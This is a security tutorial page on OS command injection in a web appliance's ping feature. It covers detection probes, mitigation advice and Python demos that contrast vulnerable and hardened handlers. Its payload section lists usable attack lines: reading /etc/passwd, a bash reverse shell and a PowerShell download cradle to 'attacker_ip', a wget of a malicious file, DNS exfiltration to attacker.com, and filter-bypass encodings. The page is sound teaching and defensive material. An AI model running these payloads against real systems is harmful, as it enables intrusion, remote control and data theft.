Command Injection.md

File metadata and controls

112 lines (95 loc) · 2.8 KB

COMMAND INJECTION

Scenario: you are testing an appliance with a web interface for administration. The interface includes a ping function, meant to check that the device can call out. You tell it to ping google.com and you see:

PING google.com (172.217.3.14): 56 data bytes
64 bytes from 172.217.3.14: icmp_seq=0 ttl=53 time=19.187 ms
64 bytes from 172.217.3.14: icmp_seq=1 ttl=53 time=17.341 ms
64 bytes from 172.217.3.14: icmp_seq=2 ttl=53 time=14.355 ms
64 bytes from 172.217.3.14: icmp_seq=3 ttl=53 time=15.116 ms
  • This looks exactly like the output of the ping command on UNIX-like systems. The server is probably running the real ping binary and passing the hostname straight onto its command line, most likely through a shell.

  • If a shell is involved, shell metacharacters in the hostname let you run other commands.

  • Try to ping the hostname with

google.com; echo test

  • If the word test appears after the ping output, the ; was treated as a command separator and your input reached a shell: the function is vulnerable. An empty page or an error when ; or & is added is not proof by itself, but it shows those characters changed how the command ran, so keep probing with other separators (&&, |) and with command substitution.

Backticks (`): a pair of backticks embeds a subcommand whose output is substituted into the original command. For example, ping `echo google.com` runs echo google.com first and then behaves exactly like ping google.com, which makes it a useful check when ; is filtered: if google.com and `echo google.com` produce the same ping output, substitution is happening.

  • If a payload like this executes, you have command execution as the user the web service runs as; on an appliance that usually means you own the system.

Mitigation

  • Never embed user data into a command line at all. Invoke the program directly with an argument vector (no shell), or do the job in-process (a socket/ICMP library for a reachability check), and validate the hostname against an allowlist pattern before using it.
  • If you must build a shell command string, use the platform's escaping routine, e.g. escapeshellarg() in PHP for each individual argument, or escapeshellcmd() for the whole command string.
  • escapeshellcmd() prefixes the characters &#;`|*?~<>^()[]{}$\ and the bytes \x0A and \xFF with a backslash, and escapes ' and " only when they are unpaired.
  • Note that escapeshellcmd() does not touch spaces. If the user input is not quoted, it can still add new arguments to the command (extra options to ping, for instance), which is enough to own a system in some cases. escapeshellarg() wraps the value in single quotes so it stays a single argument.
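The following is an added example, not code from the original page: the appliance's ping handler written the vulnerable way (string concatenation plus a shell) next to the hardened way (allowlist hostname validation plus an argument vector, no shell), with the canary probe from the walkthrough run against both. The example assumes `echo` as a stand-in for `ping` so it runs offline; the injection mechanics are identical because the vulnerable version goes through /bin/sh -c either way.

```python
"""Vulnerable vs. hardened 'ping' handler (added example, not from the page).

`echo` stands in for the real ping binary (assumption: ping may not exist or
have network access here); both versions pass the host the same way.
"""
import re
import subprocess

# Stand-in for ["ping", "-c", "4"]; constructed for this demo.
PING_ARGV = ["echo", "PING"]

# RFC 1123 hostname: labels of alphanumerics and hyphens, no leading or
# trailing hyphen, joined by dots. No shell metacharacter can pass this.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def run_vulnerable(host: str) -> str:
    """The appliance's bug: concatenate the input and hand it to a shell."""
    cmd = " ".join(PING_ARGV) + " " + host
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout


def validate_hostname(host: str) -> str:
    """Allowlist check; rejecting a leading '-' also blocks option injection."""
    if not HOSTNAME_RE.match(host):
        raise ValueError(f"rejected hostname: {host!r}")
    return host


def run_hardened(host: str) -> str:
    """Validated value passed as one argv element: no shell ever sees it."""
    argv = PING_ARGV + [validate_hostname(host)]
    proc = subprocess.run(argv, capture_output=True, text=True)
    return proc.stdout


def probe_payloads(host: str, canary: str) -> dict:
    """The detection step from the walkthrough, one payload per separator."""
    return {
        "semicolon": f"{host}; echo {canary}",
        "and": f"{host} && echo {canary}",
        "pipe": f"{host} | echo {canary}",
        "backtick": f"`echo {canary}`.{host}",
        "subst": f"$(echo {canary}).{host}",
    }


def is_injectable(runner, host: str, canary: str = "c4n4ry") -> list:
    """Return the names of the payloads whose canary came back in the output."""
    hits = []
    for name, payload in probe_payloads(host, canary).items():
        try:
            out = runner(payload)
        except ValueError:
            continue  # the hardened handler refused the input outright
        if canary in out:
            hits.append(name)
    return hits


if __name__ == "__main__":
    print(is_injectable(run_vulnerable, "google.com"))  # every payload hits
    print(is_injectable(run_hardened, "google.com"))    # []
```

The hardened handler rejects rather than escapes: a hostname that fails the allowlist is simply not pinged, so there is no escaping routine whose edge cases (spaces, unpaired quotes, leading hyphens) need to be reasoned about.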

Command Injection Payloads (Linux)

  1. Simple command injection (; runs the next command unconditionally)
; ls -la
  2. Command chaining with && (runs only if the previous command succeeded)
&& whoami
  3. Command substitution with backticks
`whoami`
  4. Command substitution with $()
$(whoami)
  5. Command injection with pipes | (the next command runs with ping's output on stdin)
| whoami

Command Injection Payloads (Windows)

  1. Simple command injection (& runs the next command unconditionally)
& dir
  2. Command chaining with && (runs only if the previous command succeeded)
&& whoami
  3. Command injection with pipes |
| whoami
  4. Caret obfuscation with ^
^& dir
     ^ is cmd.exe's escape character, so ^& reaches cmd as a literal ampersand; it only acts as a separator when the string is parsed by cmd twice (for example when the application wraps the command in another cmd /c). Its main use is evading keyword filters, since carets inside a word are stripped: &w^h^o^a^m^i runs whoami.

Advanced Payloads

  1. Retrieve the /etc/passwd file (Linux)
; cat /etc/passwd
  2. Reverse shell (Linux, bash)
; bash -i >& /dev/tcp/attacker_ip/attacker_port 0>&1
  3. Reverse shell (Windows)
& powershell IEX (New-Object Net.WebClient).DownloadString('http://attacker_ip/shell.ps1')
  4. Bypass keyword filters with hex encoding (Linux, bash)
; $(echo -e '\x63\x61\x74 /etc/passwd')
     A bare echo -e '\x63\x61\x74 /etc/passwd' only prints cat /etc/passwd; wrapping it in $() makes the shell execute the decoded text.
  5. Chained command to download a file (Linux)
; wget http://attacker_ip/malicious_file
  6. DNS exfiltration (Linux): the command output becomes a subdomain in a DNS query you can observe on your own nameserver
; nslookup `whoami`.attacker.com

Common Bypass Techniques

  1. Whitespace bypass: ${IFS} expands to the shell's field separator, so the command is split into words although the raw input contains no space
;$(echo${IFS}whoami)
  2. URL-encoding bypass: only effective when the filter inspects the parameter before the server decodes it (or the value is decoded twice)
%3B%20whoami
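As an added example (not from the original page) of why these two bypasses work, the following runs them against two typical blocklist-style "fixes": rejecting any space in the hostname, and filtering the raw parameter before URL-decoding it. The example assumes `echo` in place of `ping` and /bin/sh as the shell so it runs offline; the word splitting and decoding order are what the payloads exploit.

```python
"""Blocklist filters against the page's bypass payloads (added example).

`echo` stands in for ping (assumption); the handler is still shell=True
with the input concatenated, i.e. the original vulnerability is untouched.
"""
import subprocess
from urllib.parse import unquote

CANARY = "c4n4ry"


def run_shell(host: str) -> str:
    """The still-vulnerable handler: /bin/sh -c 'echo PING <host>'."""
    proc = subprocess.run("echo PING " + host, shell=True,
                          capture_output=True, text=True)
    return proc.stdout


def space_filter(raw: str) -> str:
    """'A hostname never contains spaces': a blocklist on the raw value."""
    if " " in raw:
        raise ValueError("space rejected")
    return raw


def filtered_then_run(raw: str, decode_after_filter: bool) -> str:
    """Filter the parameter, optionally URL-decode it, then run it.

    Decoding *after* filtering is the ordering bug that %3B%20 abuses:
    the filter sees no space, the shell sees '; echo ...'.
    """
    host = space_filter(raw)
    if decode_after_filter:
        host = unquote(host)
    return run_shell(host)


def ifs_bypass_payload(host: str) -> str:
    """${IFS} expands to the field separator characters (space, tab,
    newline), so 'echo${IFS}c4n4ry' is split into 'echo' 'c4n4ry' even
    though the raw string never contained a space."""
    return f"{host};echo${{IFS}}{CANARY}"


def url_encoded_payload(host: str) -> str:
    """'%3B%20' becomes '; ' once the server decodes it."""
    return f"{host}%3B%20echo%20{CANARY}"


def executed(output: str) -> bool:
    """True only if the canary was printed by its own echo (its own line),
    not merely echoed back as part of an undecoded literal string."""
    return CANARY in output.splitlines()


if __name__ == "__main__":
    print(executed(filtered_then_run(ifs_bypass_payload("google.com"), False)))  # True
    print(executed(filtered_then_run(url_encoded_payload("google.com"), True)))  # True
    print(executed(filtered_then_run(url_encoded_payload("google.com"), False)))  # False
```

The plain payload with a space is what the filter was written for and it is rejected, but neither bypass needs one; the fix is an allowlist on the decoded value, not a longer blocklist.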